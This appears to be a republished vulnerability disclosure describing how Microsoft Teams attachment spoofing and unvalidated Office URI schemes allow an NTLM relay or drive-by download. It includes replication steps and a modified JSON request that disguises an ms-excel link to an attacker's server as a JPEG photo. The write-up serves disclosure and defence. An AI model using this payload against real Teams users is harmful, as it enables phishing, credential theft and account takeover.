Remote Code Execution In Microsoft Team via NTLM Relay Attack 


*All GIFs contained within this post can be watched in HD for clearer viewing, Medium unfortunately does not allow this to be set by default* via NTLM Relay — Attack —

Due to a lack of permission enforcement and attachment spoofing vulnerabilities, a Teams user can fall victim to RCE via a NTLM Relay Attack, or a DriveBy download Attack .

After completing the “GIFShell” research,

“GIFShell” — Covert Attack chain and C2 Utilizing Microsoft Teams GIFs

Table of Contents

I realized that while compelling, the attack chain relies on a dropper being downloaded and run on a victim’s machine. I set out to prove that this was possible through Teams itself, instead of through another application or social engineering method.

The vulnerabilities outlined in this report were reported to Microsoft in June 2022. Microsoft ultimately decided that the research did not meet their “bar for immediate servicing”. Microsoft has explicitly granted permission to “blog about/discuss this case and/or present your findings publicly”.

This research demonstrates how it is possible to send highly convincing phishing attachments to victims through Microsoft Teams, without any way for a user to pre-screen whether the linked attachment is malicious or not.


Microsoft’s documentation states, that by default, external users cannot share files with users in another tenant for security reasons. This prevents an external user from sending a user in another organization, a malicious attachment via Microsoft Teams.

Attach File to MS Teams Chat with External contact – Microsoft Q&A

@HerschelSalan-9385, This is by default. External access user cannot share files. The following image shows what could…

Use guest access and external access to collaborate with people outside your organization …

This article describes two of the options for collaborating with people outside your organization: External access – A…

If a user in one organization wishes to send an attachment to a user in another organization, you’ll notice that there is no paperclip option to upload an attachment.

Remote code execution RCE In microsoft team

However, due to a lack of permission enforcement, this can be bypassed, and attachments can be sent to external users.

When a file is uploaded to Microsoft Teams in a message to an allowed user like a co-worker in an Azure organization, Microsoft generates a Sharepoint link to the file, that only the sender and recipient of the Team’s message can view. When a user then clicks send on the Teams message containing the attachment, a JSON body is sent in a POST request to a Teams endpoint containing the Sharepoint link to the file, and several other file attributes.

This JSON body can then be modified, and included in a POST request to the conversation endpoint associated with an external user. This allows for a Teams attachment to be shared with the external user, despite the permissions stating we can’t, and the UI not supporting file upload functionality to an external user by default.

The Sharepoint links in the JSON body are not validated server-side, and can be swapped out with any URL. Additionally, the file type attributes in the JSON body can be changed from a file format like a JPEG, which Teams will try and render in-line, to a file format which Teams doesn’t know how to render inline, like a dll file. This allows the file to appear like a legitimate attachment, without Microsoft Teams trying to render a preview in-line.

When the external user receives the file, it appears completely normal. The file name is a jpeg file, and if a user hovers over the file in Teams, the jpeg file name is displayed as well. There is absolutely no evidence to the user that the file is malicious.

Even hovering over the file for deeper inspection, does not reveal the attachment’s true contents

Microsoft Teams supports Deep Linking, which allows for Teams users to share links, which when clicked carry out Teams actions, like sending a chat:


Also Read : How I escalated Remote File Inclusion into Local File Inclusion

Create deep links – Teams

In this article, you’ll learn how to create deep links and navigate them in your Microsoft Teams apps with tabs.

However, Teams does not validate if only Teams deep links are being used, and allows for any Microsoft URI scheme to be used like msdt:/, ms-rdx-document:/, ms-excel:/ and more.

Office URI Schemes

This document defines the format of Uniform Resource Identifiers (URIs) for office productivity applications. The…

These allowed, potentially unsafe URI schemes, combined with the lack of permissions enforcement and attachment spoofing vulnerabilities, can allow for a One Click RCE via NTLM relay in Microsoft Teams.

When clicked, instead of fetching the specified file from a Sharepoint server, like a normal Teams attachment would, a URL is visited like


This URL immediately opens Microsoft Excel on the victim’s machine, and tries to fetch that xls file from the specified UNC path, in this case the attacker’s server. This sends an SMB handshake to the attacker’s listener, allowing an attacker to capture the NTLM hash, and forward it to the Domain Controller, achieving RCE as that user. via NTLM Relay —

Even if SMB signing is turned on, and SMBv2 is in use, the Net-NTLMv2 hash can still be cracked offline, and the victim’s password can be retrieved. hash can still be cracked offline and the password retrieved, in this case, “kali123”

As previously mentioned, the Sharepoint links in the JSON body are not validated server-side, and can be swapped out with any URL.This can also allow an attacker to insert a malicious URL into the attachment, and carry out a DriveBy download attack as well. Attack —

Suggested Mitigations For Vendors

Replication Steps


  • Set up two Azure organizations, with a user in each org
  • Victim is part of an organization utilizing Active Directory
  • Have an intercepting proxy set-up in your browser and visit the Teams website as the attacking user
  • Teams (Work or School) on Windows as the victim
  • A Kali machine with NTLM Relay, Responder,, Impacket, and Hashcat

1) Turn on your intercepting proxy

2) Send a Teams message to the victim containing any word. The intercepted request should look something like:

POST /v1/users/ME/conversations/19%3A89a6189b-7191-439a-b197-a3aea9628371_9e02156d-981c-4a84-b2bf-0c5cc1382b8c%40unq.gbl.spaces/messages HTTP/2{"content":"<p>hello</p>","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"7006813894289134319","imdisplayname":"Chris Green","properties":{"importance":"","subject":""}}

3) Change the JSON body to the following:

  • Mentions of should be swapped out with your Kali’s IP address or if you are conducting a Drive-by-download attack, the entire URL can be swapped out with your malicious URL.
  • The clientmessageid should be swapped out with the clientmessageid of your original message in Step #2.
  • The name Chris Green should be swapped out with your attacker’s Teams name.
{"content":"","messagetype":"RichText/Html","contenttype":"text","amsreferences":[],"clientmessageid":"1064847113124255235","imdisplayname":"Chris Green","properties":{"files":"[{\"@type\":\"\",\"version\":2,\"id\":\"b743d9ef-ce96-469c-b3fc-b31b13eb8dc2\",\"baseUrl\":\"ms-excel:/ofv|u|//\",\"type\":\"dll\",\"title\":\"Christmas_Party_Photo.jpeg\",\"state\":\"active\",\"objectUrl\":\"ms-excel:/ofv|u|//\",\"itemid\":\"b743d9ef-ce96-469c-b3fc-b31b13eb8dc2\",\"fileName\":\"Christmas_Party_Photo.jpeg\",\"fileType\":\"dll\",\"fileInfo\":{\"itemId\":null,\"fileUrl\":\"ms-excel:/ofv|u|//\",\"siteUrl\":\"ms-excel:/ofv|u|//\",\"serverRelativeUrl\":\"\",\"shareUrl\":\"ms-excel:/ofv|u|//\",\"shareId\":\"71cdddb7-9c23-4aa0-a579-60662cc5d357\"},\"botFileProperties\":{},\"filePreview\":{},\"fileChicletState\":{\"serviceName\":\"p2p\",\"state\":\"active\"}}]","importance":"","subject":""}}
Resulting attachment delivered to the victim from an external sender

Tags :